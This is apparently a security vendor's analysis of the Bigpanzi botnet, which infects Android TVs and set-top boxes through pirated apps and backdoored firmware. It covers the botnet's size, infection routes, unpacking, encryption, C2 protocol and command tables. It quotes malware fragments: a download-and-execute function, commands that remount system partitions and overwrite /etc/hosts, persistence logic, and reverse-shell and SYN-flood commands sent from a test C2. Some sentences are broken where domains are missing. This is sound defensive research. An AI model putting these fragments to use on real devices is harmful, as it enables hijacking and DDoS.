Bigpanzi Exposed: The Hidden Cyber Threat Behind Your Set-Top Box

Bigpanzi Exposed: The Hidden Cyber Threat Behind Your Set-Top Box


Some time ago, we intercepted a dubious ELF sample exhibiting zero detection on VirusTotal. This sample, named pandoraspear and employing a modified UPX shell, has an MD5 signature of 9a1a6d484297a4e5d6249253f216ed69. Our analysis revealed that it hardcoded nine C2 domain names, two of which had lapsed beyond their expiration protection period. We seized this opportunity to register these domains to gauge the botnet's scale. At its peak, we noted approximately 170,000 daily active bots, predominantly in Brazil.

Upon realizing that we had secured their domains, the group countered aggressively. They bombarded our domains with DDoS attacks to force them offline and manipulated the hosts files of the infected devices. This strategy redirects certain domain names to specific IP addresses, bypassing the normal DNS resolution process used to find the IP addresses of Command and Control domains. This greatly limits our ability to observe and track them.

We finished analyzing the sample fast and started monitoring the botnet's attack instructions. This led us to various download scripts, such as,, and These scripts either directly provided additional implants for the syndicate, like pcdn, ptcrack, and p2p_peer, or indirectly expanded our insight. Notably, a discernible pattern in the Downloader URLs within these scripts led us to 22 such URLs. These were hard-coded into a set of APKs used for deploying pandoraspear/pcdn-containing Android platform firmware upgrades. Moreover, the implants unraveled further connections. For instance, specific strings in pcdn pointed us to two Windows platform DDoS tools linked to the group. These tools further led us to 32 eCos platform firmwares embedding five domains, which shared the same IP for C2 resolutions as pcdn.

As our investigation and source tracing deepened, a major cybercrime syndicate, active since 2015, gradually surfaced. This syndicate primarily targets Android OS TVs and set-top boxes, as well as eCos OS set-top boxes. Differing from typical botnets spreading through 0/N day vulnerabilities, this group's modus operandi involves enticing users to install free or cheap audio-visual apps or firmware updates, embedding backdoor components. Once installed, these devices transform into operational nodes within their illicit streaming media platform, catering to services like traffic proxying, DDoS attacks, OTT content provision, and pirate traffic. Considering the botnet's enormous scale and the filename pandoraspear, we dubbed the cybercime syndicate Bigpanzi.


Since we started tracking their commands, we've been quietly collecting evidence and steadily working to trace Bigpanzi's origins, with the ultimate goal of delivering a decisive strike against them.In May 2023, Dr.WEB spotlighted pandoraspear, and on September 6, they shared their discoveries with the community, enriching our understanding of pandoraspear's spread through pirated traffic APKs.

Bigpanzi's menace extends beyond the infamous DDoS attacks. It can misuse controlled Android TVs and set-top boxes to disseminate any form of visual or audio content, unbound by legal constraints. This mode of attack has manifested in real-world incidents, like a network attack on set-top boxes in the UAE on December 11, 2023, where regular broadcasts were substituted with footage of the Israel-Palestine conflict. The potential for Bigpanzi-controlled TVs and STBs to broadcast violent, terroristic, or pornographic content, or to employ increasingly convincing AI-generated videos for political propaganda, poses a significant threat to social order and stability.

With these factors in mind, we decided to document our findings in this article, sharing our discoveries with the community in hopes of collaboratively dismantling this cybercrime syndicate that has been in hiding for eight years.

The Identity of Bigpanzi

Within the Pcdn sample, we identified a downloader domain: Through Google searches, we unearthed two pivotal leads. One provided instructions for device upgrades, and the other offered guidance on device repairs. Particularly striking was the YouTube channel at [], teeming with device operation-related videos, all conveying a pronounced “official” vibe.


On the official website of a Spanish manufacturer FoneStar, specifically on the product page for the RDS-585WHD, we located an eCos system firmware, b0a192c6f2bbd7247dfef36665bf6c88.


This firmware shared identical DDoS task names and method names with Pcdn, marking it as an “official firmware embedded with malware.” (Note: This doesn’t directly implicate FoneStar as Bigpanzi!)


The uncovering of this “official video account” and “official malware-infused firmware” led us to speculate about the real identity of Bigpanzi. Our tracing efforts have indeed been fruitful, revealing significant evidence pointing towards a company. However, we choose not to divulge the details here. If you're curious about the full story, feel free to contact us for more details !


We successfully hijacked two C2 domains of pandoraspear: and During a seven-day observation period, the peak daily active bots were around 170,000, primarily in Brazil. Unfortunately, the authors countered by modifying Hosts and launching DDoS attacks. We didn’t engage much in this confrontation, voluntarily ceased resolving, and consequently lost this perspective. On August 15, 2023, we reactivated the resolution for and observed a peak daily bot activity of 77,849, with the count on October 13 being 27,446.


In September 2023, we hijacked the downloader domain from pcdn, observing a peak daily bot activity of 80,816 on October 13.


What’s the relationship between pandoraspear and pcdn? Early download scripts like or contained segments where downloads updates for pandoraspear and for pcdn, appearing in pairs on compromised devices.


However, in the current primary download script, pandoraspear appears alone, with pcdn-related code being commented out. Thus, data observed through can be considered as residual data. The sum of data from both and likely represents the true scale.


After deduplicating the data, the peak daily active bots on October 13 were 107,819. Adding up the data from both domains on the same date, 27,446 + 80,816 = 108,262, which is only 443 more than 107,819. The overlap is minimal, confirming that the botnet's scale exceeds 100,000.


The botnet nodes are predominantly distributed across Brazil, amassing over 1.3 million distinct IPs since August.


The distribution of bot nodes in Brazil is primarily in São Paulo.



A botnet of 100,000 is quite substantial, but we believe the actual size may be larger due to two factors:

  • Observational Limitations: The hijacked C2 and downloader domains are just one of many options for pandoraspear/pcdn, leading to potential omissions.
  • Device Specificity: TVs or STBs as compromised devices might not be powered on 24/7, also leading to data omissions.

Some may wonder if there's a way to measure the true daily active scale of pandoraspear. The answer is yes! Pandoraspear updates the device's hosts through the following URLs, theoretically allowing Amazon to track all visiting IPs.

Is it possible to govern such a large-scale botnet? Again, the answer is affirmative!

  1. Solution 1: We control two of pandoraspear's nine C2s. By responding according to the network protocol, we can take over part of the network.
  2. Solution 2: Pcdn executes payloads from the downloader using the system command without verification. We can issue scripts via the downloader to modify hosts, thereby taking control of part of the network.
  3. Solution 3: Amazon could take over the domains used by pandoraspear to host hosts files. By distributing new hosts files to hijack C2s, they could take control of the entire network.


How does such a large-scale botnet infect devices? Currently, we know that Bigpanzi targets Android and eCos platforms, employing the following three methods to infect user devices:

  1. Pirated movie & TV apps (Android)
  2. Backdoored generic OTA firmware (Android)
  3. Backdoored "SmartUpTool" firmware (eCos)

Android: APP Infection

Dr.Web has already conducted a detailed analysis of this method in their blog, which interested readers can refer to for more information.


Android: Backdoored OTA Firmware Infection

The second method involves backdoored generic OTA firmware. We discovered this while tracking commands for pandoraspear, receiving instructions to download and execute scripts containing the following code snippet. We identified 'stb-download/tool/' as a strong characteristic, leading us to potentially surprising findings when traced.

function dl_file() {
    cd /data/ && rm -rf pdbak  && curl "$1" -o pdbak && chmod 755 pdbak  

Indeed, hunting with "/stb-download/" revealed 22 suspicious domains following a unified pattern: stb-download/s905{}/package_list.xml, distributed across 7 APKs belonging to 2 different packages.


For instance, 606939075437b985bce0d46b080419d9 in's setUrl method shows the mentioned URL.


These APKs mainly download and upgrade firmware based on different models. For example,'s package_list.xml combines the URL and NAME in Payload to form an OTA firmware download address.


From this address, we downloaded a firmware with an MD5 of 8b42856160806089fc63a97b0f31841d. Upon extraction, we found familiar friends pandoraspear and pcdn in its /system/bin directory. From 18 URLs, we extracted 4 firmwares, spanning 2019 to 2023, all containing pandoraspear or pcdn, confirming Bigpanzi's development of backdoored OTA upgrade packages for device infection.


The setUrl method also includes many model.equalsIgnoreCase("Ebox") codes for device model comparison. We identified 12 different device models targeted by Bigpanzi across 7 APKs:

Ebox Obox Hbox+
Htv-6h H6-INT Luan2
A3 IceCream Tigre 2
A3 Pro H7 UniTV

Additionally, we found backdoored firmware on forums like, such as a post by user EL_LARA, offering firmware named with MD5 b77b797ac55e378f952ce120bab97b12.


This firmware, a compressed package, contained core components of Bianpanzi like pandoraspear and pcdn.


eCos: Backdoored "SmartUpTool" Firmware Infection

During the trace of Pcdn, we found a DDoS Builder linked to this cybercrime syndicate, with one of its C2 domains being Numerous firmwares starting with SmartUpToolRomFile related to another subdomain,, contained Pcdn's unique attack vector ddiy01task.


For example, d71e54f42d6b45604cf29780256032d8, whose format we weren't familiar with, was forcibly extracted using binwalk.


File A0038 contained many strings related to Pcdn's DDoS functionality, and five domains resolved to the same IP as Pcdn's C2, suggesting a backdoored firmware with a module similar to Pcdn's DDoS function.


This firmware, named Nueva_EMU_103_RDS_585_WHD_24_09_2021_Emu_Limpia_sin_canales_con_el_logo_Fonestar on VT, was also found on the forum, posted by the same EL_LARA.


In conclusion, Bigpanzi spreads backdoored firmware through various STB, DVB, and IPTV forums to infect devices running Android or eCos systems.

Analysis of Bigpanzi Samples

The Bigpanzi group uses a wide range of sample types, including PE, DEX, and ELF formats. This analysis will begin with the ELF format pandoraspear, reverse engineering it to uncover the methods of infection, the devices targeted, the operational tactics, and ultimately to map out the expanse of this vast cybercrime network.

Before delving into the reverse engineering, let's first look at the countermeasures employed by Bigpanzi's samples at both the binary and runtime levels. These strategies have been crucial in keeping them hidden from security radars for an extended period and are deceptively simple yet highly effective.

0x00: Countermeasures

Modified UPX Shell

The pandoraspear sample utilizes UPX for packing, but with a twist: the magic number is altered to 0x71284075. This particular magic number can be seen as a signature of the group, given its consistent use over time. To unpack, simply replace the magic number with 0x21585055 (UPX!) and then proceed with upd -d.pan_upx.png

Dynamic Linking

Pandoraspear relies on dynamic linking and the use of an external libcurl library. This dependency is a key factor in its prolonged low detection rate, as it often fails to run in standard sandbox environments. To execute or debug the sample, an appropriate version of is necessary. In our analysis, we used a libcurl library with the hash 49F65662C089C5E009FB76AF1971F9DA. pan_dyn.png

OLLVM Techniques

Pandoraspear has been processed with OLLVM, applying control flow flattening and instruction substitution. The evolution from versions 8 to 10 shows minor functional changes but a significant increase in the number of flattened functions and passes. In IDA, this is evident as an increase in the number of blocks within a function. For example, a main function in v8 that initially had 168 blocks expanded to 1110 blocks post-flattening, and in v10, it ballooned to a staggering 1947 blocks.


For de-flattening, various methods and tools are already available in the community. We employed the "Dynamic Execution + LOG Recovery" approach, which is straightforward and effective. The optimal solution, however, is to find versions that weren't compiled with OLLVM. Luckily, in the early stages of our investigation, we discovered versions 1 and 2 without OLLVM, which greatly facilitated our initial reverse engineering process.

Anti-Debugging Mechanism

Pandoraspear employs an anti-debugging technique by reading the TracerPid from "/proc/{PID}/status" to determine if it's being debugged (non-zero value).

0x01: Pandoraspear Analysis

Since 2015, pandoraspear has been continuously evolving, with the latest version being v10. We have captured eight different versions of this malware, including v1, v2, v4, v6, and up to v10. A cross-comparison of these versions reveals that their main execution logic remains consistent, with variations primarily in aspects such as shell packaging, usage of OLLVM for compilation, and the range of supported commands. Notably, the pandoraspearrk version stands out as being significantly larger than the others. This increase in size is not due to added functionality but rather because it embeds the curl library.


In summary, pandoraspear is a backdoor trojan targeting Android systems, characterized by its straightforward and clear execution logic, which can be divided into three main steps:

  1. DNS Hijacking: Initially, it requests an encrypted hosts file from a remote server. After decrypting this file, pandoraspear replaces the /etc/hosts file on the compromised device, thereby achieving DNS hijacking. This step is crucial for controlling the device's network traffic and redirecting it as needed.
  2. Establishing Communication with C2 Servers: The malware then establishes communication with a Command and Control (C2) server. This C2 can be specified via the command line, decrypted from /data/.ms, or be hardcoded within the malware itself. This step is vital for receiving updates, instructions, and transmitting data back to the attackers.
  3. Executing Commands from C2: Finally, pandoraspear awaits instructions from the C2 server, ready to execute various functions such as launching Distributed Denial of Service (DDoS) attacks, initiating a reverse shell, or executing other commands as directed. This functionality demonstrates the malware's capability to perform a range of malicious activities remotely controlled by the attackers.

The following analysis will delve into the details of these three key steps, exploring how pandoraspear operates and the implications of its actions on infected Android systems. By understanding its methodology, we can gain insights into the malware's capabilities, objectives, and the threats it poses.

1.1 Hosts Hijacking

Pandoraspear employs a method of DNS hijacking by modifying the /etc/hosts file. It starts by using libcurl to download an encrypted hosts file from a hardcoded URL in the malware sample. This file is then saved locally as /data/.hosts. Different versions of the malware contain slightly different hardcoded URLs. For detailed URLs, please refer to the IOC (Indicators of Compromise) section. The primary URL currently in use is The content of this downloaded file is encrypted.


It's noteworthy that in the parent directory 'dns' of the URL used by pandoraspear, we discovered numerous backups of earlier hosts files, dating back to 2018. This finding indicates that the Bigpanzi group has been actively maintaining, updating, and expanding its operations over several years.


The decryption process for the hosts file used by pandoraspear can be broken down into three steps, and a complete decryption script is provided in the appendix:

  1. Code Table Replacement: This step involves replacing specific characters or sequences in the encrypted file according to a predetermined code table.
  2. Bit Shifting Calculation: This involves processing every six bytes of the encrypted data, shifting their bits to obtain four bytes of decrypted data.
  3. Blowfish ECB Decryption: The final step is to decrypt the data using the Blowfish algorithm in ECB (Electronic Codebook) mode. The key used for decryption is the hardcoded string 'zAw2xidjP3eHQ'.

Taking the hosts file dated "07 Nov 2023 07:20:00" as an example, decryption using the script reveals part of the hosts file. In this decrypted segment, it's observable that the C2 domain names we hijacked are redirected to pandoraspear's own C2 IP,


Once the /data/.hosts file is decrypted, the following commands are used to overwrite the system's /etc/hosts file:

# 1:enable write

/system/xbin/busybox mount -o rw,remount /dev/block/system /system
mount -o rw,remount /dev/block/system /system
mount -o rw,remount /

# 2:replace /etc/hosts
/system/xbin/busybox cp -ar /data/.hosts /etc/hosts && chmo d 644 /etc/hosts && busybox rm -rf /data/.hosts
/vendor/xbin/busybox cp -ar /data/.hosts /etc/hosts && chmo d 644 /etc/hosts && busybox rm -rf /data/.hosts

# 3: disable write
/system/xbin/busybox mount -o ro,remount /dev/block/system /system
mount -o ro,remount /dev/block/system /system

Q: Why does pandoraspear hijack HOSTS files?

Hijacking the HOSTS file is not an overly sophisticated technique, but when used effectively, it can have significant effects. We believe pandoraspear hijacks HOSTS files for the following three purposes:

  1. Traditional Malicious Intentions: This includes website blocking, evasion of intrusion detection systems, information theft, and phishing. By redirecting traffic to different domains, pandoraspear can manipulate the user's web experience and intercept or redirect data for malicious purposes.
  2. Protecting Its Own Assets: In cases where C2 (Command and Control) or other important operational domains are hijacked or sinkholed, modifying the HOSTS file can help regain control. This is a direct method to redirect traffic to a new domain controlled by the attackers, even if the original domain is compromised.
  3. Facilitating Operational Management: As a long-standing cybercrime operation, the group might use certain domains for short-term operations or testing. By using the HOSTS file to redirect traffic, there is no need to formally register these domains, thus reducing operational costs. This can be especially useful for temporary or experimental campaigns, allowing for quick changes without the need to manage domain registrations and DNS records.

1.2 Launching Pcdn & Reporting Device Status

Pandoraspear initiates two key tasks, runpcdn and report_status, through thpool_add_work. The former is responsible for starting the pcdn process, while the latter is tasked with reporting the status of the compromised device to the Command and Control (C2) server.


In both of these functions, pandoraspear employs a novel encryption method to protect sensitive strings. This approach is designed to prevent the immediate revelation of its functionalities through straightforward analysis.


The following is an equivalent Python implementation of the code depicted in the above diagram.

def decbuf(buf):
    for i in range(3,leng+3):

Taking the ciphertext in runpcdn as an example.


After decryption


In fact, runpcdn merely employs the sprintf function to assemble the strings shown in the diagram into a script. This script is then executed using the system function. Its purpose is to ascertain whether the pcdn process is active on the system. If it's not, the script initiates either /system/bin/pcdn or /data/.pcdn.

pid=`ps|grep -v grep|grep "/system/bin/pcdn" |awk '{print $2}'`
if [ -z $pid ];then
/system/bin/pcdn >/dev/null 2>&1 &
/data/.pcdn >/dev/null 2>&1 &

1.3 C2 Communication

Pandoraspear establishes communication with its Command and Control (C2) servers in a specific order. In versions before v6, all three of the following methods were supported, but from version v7 onwards, only the last two are supported:

  1. Command Line Specified: The C2 server is specified via command-line arguments.
  2. /data/.ms File: The C2 server information is stored in an encrypted form in this file.
  3. Hardcoded in the Sample: The C2 server is hardcoded within the malware sample.

It's important to note that the C2 information in the /data/.ms file is encrypted and the decryption method is the same as that used for the hosts file.


If the C2 from the /data/.ms file fails, pandoraspear defaults to using the hardcoded C2.


According to Dr.Web's analysis, it was initially believed that there were only four C2 servers, but this is an understatement. In reality, there are four groups of C2 servers, each group containing three servers, making a total of nine unique C2 servers after deduplication.
romatotti520.xxxxx (mask)

Once pandoraspear obtains a C2 address using any of the above methods, it attempts to establish communication with the C2 server's port 9999 and sends encrypted device information to signal that it's online. The source of the device information depends on whether the serial number can be successfully read:

  1. Successful Serial Number Retrieval: If the serial number is successfully obtained, it's concatenated with the device's country, city, ISP, and other information to form the device information (Format 2).
  2. Serial Number Retrieval Failure: If the serial number cannot be read, the device's MAC address is used instead (Format 1).

The online information communicated by pandoraspear to the C2 server uses the same encryption method as that employed for the hosts file. By examining two actual online packets received by the sinkhole server, and decrypting their content, we can validate the previous analysis. In the decrypted content, "1000" denotes an online status signal, and "0008", "0010" represent the version numbers of the malware.

  • format 1

    # decryption
  • format 2

    1000@1a.01-22.10-22137263@0008@8367@193d3d@BR@Braganca Paulista@Redenilf Servi\xc3\xa7os de Telecomunica\xc3\xa7\xc3\xb5es Ltda@\x00\x00

For instance, considering the online requests monitored by a sinkhole on October 13th, the comparison between version numbers and the number of requests is illustrated in the table below, indicating that versions 8, 9, and 10 are the most prevalent at present.

Version Request Count
0010 992537
0008 175722
0009 46178
0007 12397
0005 9360
0006 4785
0004 3264

1.4 Commands

Once online, pandoraspear begins to await commands issued by the C2 (Command and Control) server. These commands are encrypted in the same manner as the hosts file, and once decrypted, their format appears as cmd@cmd_item1@cmd_item2@...@. Through tracking, over 100,000 such commands have been received, with recent ones including:


Based on the format of the commands, we can discern that in the diagram above, the numbers 88, 5000, and 6269 represent different commands. But what are their functions? Specifically, 88 initiates a reverse shell, 5000 specifies the C2 server via /data/.ms, and 6269 executes a command. Beyond these, pandoraspear also supports commands for DDoS, self-updating, and more. For a comprehensive list of additional commands and their respective functions, please refer to the table below.

v1 & v2 Cmds

Cmd Descrption
11 Add dns via /etc/hosts
12 Del dns via /etc/hosts
21 Download new version to /koocan/savebin, update
31-38 Pandoraspear ddos vectors: syn,upd,icmp,mix,smurf,tagr3,cc,dnsflood
88 Reverse shell
110 Stop ddos
3000 Write new c2 to /data/.ms, and connect to the server
5000 Write new c2 to /data/.ms
5555 Repalce c2 in /data/.ms with new c2
6269 Execute cmd

v4-v10 Cmds

Versions subsequent to v4 (or v3) support all commands from v1 and v2, and introduce some new features. Among the most notable is the inclusion of support for Mirai attack vectors.

Cmd Descrption
39 11 mirai ddos vectors
200 Check if the MD5 of a file matches the provided MD5 and return the result to C2
201 Similar with 200, but if not match, download the provided MD5
4000 Add a new task into threadpool: Download and decrypted the freeze hosts, add new iptbales rules to drop the traffic related with freeze hosts
4001 Exec iptables -D INPUT %d ,delete the specific rule
4004 Add a new task into threadpool: Execute cmd return result to C2
4007 write info into /dec/block/hide(offset 0x2800 or 0x2c00)

1.5 Communication Experiment

To validate the accuracy of the analysis, a communication experiment was conducted. The setup involved creating a file /data/.ms on a test device containing the IP address of a test server set up as a fake C2 (Command and Control) server. When the fake C2 received an online packet, it issued a reverse shell command and a SYN flood command. The encrypted and decrypted forms of these commands were as follows:

Test Device Configuration:

  • /data/.ms content:
    • Encrypted: jTyzJ0Jsy9J0.dlr6.kpjwj1
    • Decrypted:

Test Server Configuration:

  • Fake C2 listening on port 9999, netcat (nc) listening on port 12345.

Reverse Shell Command:

  • Encrypted: S6uhZ0bk5OR/2GoxK1ddQhJ1zMcR3//8TkY/
  • Decrypted: 88@\x00\x00

SYN Flood Command:

  • Encrypted: o4Bmz/HksdL12GoxK1ddQhJ1DJ8g8.GoiiS1
  • Decrypted: 31@\x00\x00\x00

Upon receiving these commands, the test device attempted to establish a reverse shell connection with and launched a SYN flood attack against The actual results corroborated the analysis.


The pcap (packet capture) file from the experiment likely showed that the source addresses in the SYN flood attack were spoofed.


This method is an outdated technique for SYN attacks, and many modern data centers implement source address validation, significantly reducing the effectiveness of such attacks. Indeed, the DDoS attack methods embedded in pandoraspear are somewhat dated and not highly effective, which may explain why the Bigpanzi group started incorporating more efficient attack vectors like those from Mirai in versions v4 (or v3) of their malware.

1.6 Gifts From Command Tracking

The analysis of pandoraspear represents the first step in understanding the Bigpanzi cybercrime group. This analysis not only reveals the existence of a large-scale botnet operating in the wild but also raises new questions about the scope and nature of the threat posed by Bigpanzi. Key questions include the types of devices targeted by pandoraspear, how it spreads, and whether the group behind it has developed other malicious implants.

In the course of a deeper investigation into this group, several downloader URLs were discovered in the tracked commands.

These URLs primarily serve to download and execute scripts like and The script is associated with pandoraspear,


while corresponds to a new implant named pcdn.


This discovery indicates that pandoraspear does not operate in isolation; it appears alongside pcdn. Beyond pcdn, other implants such as ptcrack, play_station, and p2p_peer were also detected. These implants share a common download URL pattern of /std-download/tool/, which was instrumental in confirming the method of device infection discussed earlier.

0x02: Pcdn Analysis

We captured five samples of pcdn, which, unlike the continuously updated pandoraspear, has been relatively stable. The latest modification date for pcdn is pinned to August 2021, with an MD5 hash of 7ccdaa9aa63114ab42d49f3fe81519d9.


Pcdn's functionalities can be summarized into two main categories:

  1. Building a Streaming Media Platform: The primary function of pcdn is to set up a streaming media platform on the infected device. It uses the Peer-to-Peer (P2P) protocol to network numerous infected devices, forming a P2P-like Content Distribution Network (CDN). This is hinted at by the file name pcdn itself, which implies 'P2P CDN'. Pcdn is suitable for various applications such as video on demand, live streaming, replay, and downloading large files. We speculate that the Bigpanzi group utilizes Pandora-CDN for streaming pirated videos and downloading related APKs.
  2. Weaponizing Devices: The secondary function of pcdn involves "weaponizing" the infected devices. It executes commands issued by the C2 server, including conducting Distributed Denial of Service (DDoS) attacks. This aspect of pcdn turns regular devices into tools for cyber attacks, expanding the operational scope of the Bigpanzi group.

2.1 Decryption

For pcdn, sensitive strings related to its two main functionalities are encrypted and stored in the data segment. The encryption method used is the same as that of pandoraspear.


To facilitate reverse engineering, a decryption script was implemented. (However, it's important to note that the script is not perfect; manual patching is required at addresses 0x00057A3E and 0x00057BF6).

def decbuf(buf):
    for i in range(3,leng+3):
    return out

for i in tmp:
    if len(i) >3 and i[0]^i[1]^i[2]==len(i)-3:

for item in items:
    i = ' '.join(f'{byte:02X}' for byte in item)

After decrypting the data segment, you would be able to view and analyze the previously encrypted strings.


2.2 Persistence

Pcdn achieves persistence on the infected device through the use of scripts such as init.amlogic.board.rc,, or The logic for achieving persistence is as follows:

  • If there is already a persistence command in init.amlogic.board.rc (like service pcdn /system/bin/pcdn), then pcdn will rename /data/pcdn to /data/.pcdn and copy it to /system/bin/pcdn. After this, it clears any persistence commands from and that involve /system/bin/pcdn&.
  • Conversely, if there isn’t a persistence command in init.amlogic.board.rc, pcdn copies /data/pcdn to /system/bin/pcdn and then adds a persistence command /system/bin/pcdn& to and

2.3 Building the PCDN Network

PCDN turns a device into a functional node in the CDN network via these steps

1: Registering the Node with Pandora-CDN Center

pcdn utilizes the serial number of the device, which it obtains from one of the devices located at /dev/block/hide, /dev/block/mtdblock4, or /dev/block/mtdblock5. It uses this serial number to register the node with the Pandora-CDN center. The pcdn samples have two central domain names hardcoded for this purpose.

The resulting network traffic is shown below:


2: Port Mapping

Pcdn implements port mapping using the Universal Plug and Play (UPnP) protocol. A distinctive feature of this process is the use of "NewPortMappingDescription" with the value set to "PCDN_H". This characteristic serves as an identifier for the port mapping activities specifically related to PCDN. Additionally, it's important to note that all the ports depicted in the following diagram are dedicated to PCDN operations.


3 : Downloading Required Toolkits and Executing Scripts to Start Services

Pcdn downloads the necessary toolkit for PCDN operation through a thread named thread_setup_pcdn_tookit.


The logic of thread_setup_pcdn_toolkit is relatively straightforward:

  • The script first checks if certain files or directories exist in the system, such as /data/, /data/p2p/play_station, or the /data/kcptun directory.
if [ ! -f "/data/" ];then ...
if [[ ! -f "/data/p2p/play_station" ]] && [[ ! -f "/system/bin/play_station" ]] then...
if [ ! -d "/data/kcptun" ] then...
  • If these are not present, it then downloads the respective toolkit files - pcdn.tar.gz, play.gz, ktptun.gz - from a remote server (either or These files are subsequently unzipped into the /data directory. It’s worth noting that the files extracted from play.gz and kcptun.gz are actually part of what is contained in pcdn.tar.gz.
  • Finally, the script checks if the relevant component processes are running in the system. If not, it starts the necessary components.
pid=`ps|grep -v grep|grep "%s"|awk '{print $2}'`
if [ -z $pid ];then

The component name is inserted in place of the first %s, and the command to start the component is placed in the second %s.


The file list within pcdn.tar.gz includes several key components, each serving a specific purpose within the Pandora-CDN framework:

  • Streaming Media Server: In the evlls directory, srs is a streaming media server supporting protocols like RTMP, HLS, and HTTP-FLV.
  • Network Acceleration: The kcp/kcptun directory contains components related to network acceleration.
  • Shadowsocks Service: Components in the ss directory are related to the Shadowsocks service.
  • P2P Networking: The p2p directory contains p2p_peer, which is related to networking among peers.
  • Video Services: The play_station is associated with video-related services.

The various ports mentioned in the previous section about port mapping are also configured in the configuration files of these components. For example, ports 8337 and 8388 are mentioned in the server-multi-port.json.

	"port_password": {
		"8387": "foobar",
		"8388": "barfoo"
	"method": "aes-128-cfb",
	"timeout": 600

In summary, pcdn utilizes open-source software like srs, ss, and kcp to transform the infected devices into SRS edge nodes and SS proxy servers. The use of KCP (Kernel Control Path) acceleration ensures the quality of service, enhancing the user experience for streaming media. The detailed business scenarios of Pandora-CDN involve many components and, due to space constraints, this article will not delve into these in detail. Further analysis of these components will be provided in a subsequent article.

0x5: HTTP Server

Pcdn sets up an HTTP server that listens on the local TCP port 19906. This server provides an HTTP service accessible via the path /getsatus. The service supports a mode query parameter, which can take values such as app, p2p, auth, and portmapping.


This HTTP service is utilized by components like play_station and punshHoleClient to query the status of the infected device.


2.4 Device "Weaponization"

In pcdn, there are three threads responsible for Distributed Denial of Service (DDoS) related tasks:

  1. dropstimetask: Manages time scheduling.
  2. dropstask: Handles communication with the Command and Control (C2) server, including receiving instructions.
  3. dropsinittask: Executes the DDoS attacks as instructed.

In the dropstask, five hardcoded C2 servers are specified, all using port 31226 (0x79fa).


Interaction Process Between the Bot and C2:

  • C2 to Bot: Issues an XOR key (4 bytes).
  • Bot to C2: Encrypts and sends device information such as the serial number (SN) using the XOR key (38 bytes).
  • C2 to Bot: Confirms that the bot is online (12 bytes).
  • C2 to Bot: Sends commands to the bot.

The dropsinittask, upon receiving commands from the C2 server, selects the appropriate ddos_vector to carry out DDoS attacks.


Pcdn supports the following eight types of attack vectors:

dicmptask dudptask
dsyntask dtcptask
dkeeptask dhttptask
dposttask ddiy01task

2.5 Gifts from Pcdn

By tracing the strings related to dropstimetask, dropstask, and dropsinittask within pcdn, we successfully located two Windows-based Distributed Denial of Service (DDoS) tools named Fl00d and Fl00d 2.0.


0x03: Analysis of DDoS Tools

Taking Fl00dce690167abeee4326d5369cceffadaaf as an example, this tool is identified as a DDoS Builder.


Its operational interface, accessible upon running the program, features a 'slave' button which, when clicked, opens a dialog box for configuration. This configuration process facilitates the generation of bot samples compatible with three platforms: STB (Set-Top Box), Linux, and Windows.


A Linux64 sample generated with the default configuration of this DDoS Builder has an MD5 hash of d6285261d6b2d0a26d186e1b831664db. Analysis with IDA reveals numerous strings related to "drops" and "task",


indicating a clear lineage between this tool's code and the DDoS-related code found in pcdn.


While pandoraspear and pcdn possess DDoS functionalities, there was initially doubt about the group's involvement in DDoS activities as no actual attack commands were tracked. However, the discovery of this DDoS Builder tool, coupled with the observed pattern of DDoS attacks initiated upon the resolution of hijacked C2 domain names, confirms the group's long-term engagement in unlawful DDoS activities.

The absence of tracked attack commands might be due to the group shifting focus as their operations expanded. For instance, content business lines involving Android TV and STBs may have become more profitable, making these high-value assets. Consequently, the group might have redirected DDoS activities to other botnets within their control, preserving the more valuable resources for content distribution and other lucrative operations. This strategic shift underscores the adaptability and evolving nature of cybercrime syndicates like Bigpanzi.

Gifts from the DDoS Builder

As mentioned in the "Infection Methods" section, through the C2 (Command and Control) servers associated with the DDoS Builder, we were able to locate 325 instances of "SmartUpTool" firmware. Out of these, 32 contained the specific string "ddiy01task" embedded within them, and all of these instances were firmware for the eCos system.


Among these 32 firmware instances identified, some share Fully Qualified Domain Names (FQDNs) that belong to the same Second-Level Domain (SLD) as the domain names used by the DDoS Builder.


Within these 32 firmware instances, there are strings related to DDoS Tasks & Vectors that are identical to those found in pcdn.


Within these 32 firmware instances, there are 5 domains resolving to the same IP address as the C2 for pcdn, specifically to


Additionally, the domain names used for the Command and Control (C2) servers in both batches exhibit very similar patterns.


These events can't just be chalked up to coincidence anymore. Since users are complaining about strange traffic from their set-top boxes on forums, we think that Bigpanzi is targeting set-top box devices that run on the eCos platform.


0x04: Preview of the Next Article

Bigpanzi has made many tools, but this article mainly looks at its key parts: pandoraspear and pcdn, because we don't have much space. We'll explore more of their tools in future articles. Here’s a sneak peek at what we'll discuss next.

ptcrack: Implemented in the Go programming language, ptcrack is a cracker targeting multiple protocols.


We will explore activities related to ptcrack that were uncovered during our command tracking.

  • p2p_peer: This component utilizes the Peer-to-Peer (P2P) protocol to discover nodes within the Pandora-CDN network.

Notably, p2p_peer provides an HTTP service on port 7172. This exposed web service has been mapped in our Global Hawk platform, accumulating over 270,000 IP addresses.

  • Business APKs: These are applications that utilize Pandora-CDN for streaming video and live broadcasts. Some domains used within these apps establish a link between pandoraspear and pcdn, showing the interconnected nature of these tools within the Bigpanzi group's operations.

0x05: Conclusion

Over the past eight years, Bigpanzi has been operating covertly, silently amassing wealth from the shadows. With the progression of their operations, there has been a significant proliferation of samples, domain names, and IP addresses. Over these years, these have accumulated in substantial numbers. Moreover, due to the reuse of code and infrastructure, there are complex connections between the samples, domain names, and IP addresses.

In the face of such a large and intricate network, our findings represent just the tip of the iceberg in terms of what Bigpanzi encompasses. There's a vast amount of tracing and investigative work still to be undertaken. For instance, understanding the purpose of domain names in the hosts files, analyzing the multitude of APKs under the /marketdatas/apk pattern, and exploring the relationship between Bigpanzi and FoneStar are crucial next steps.

The analysis presented in this article is but a faint light in the darkness, illuminating a small part of the shadowy existence of Bigpanzi. We welcome insights from the cybersecurity community and invite collaboration from those with the motivation and capability to manage such threats. Together, there's an opportunity to combat the Bigpanzi group and contribute to maintaining cybersecurity.


pandoraspear sample


pandoraspear C2	United States|Missouri|Saint Louis	AS30083|, LLC

pcdn sample


pcdn C2 

pcdn domain

DDoS builder C2

Downloader	United States|California|Los Angeles	AS174|Cogent Communications	United States|California|Los Angeles	AS174|Cogent Communications

Hosts Downloader

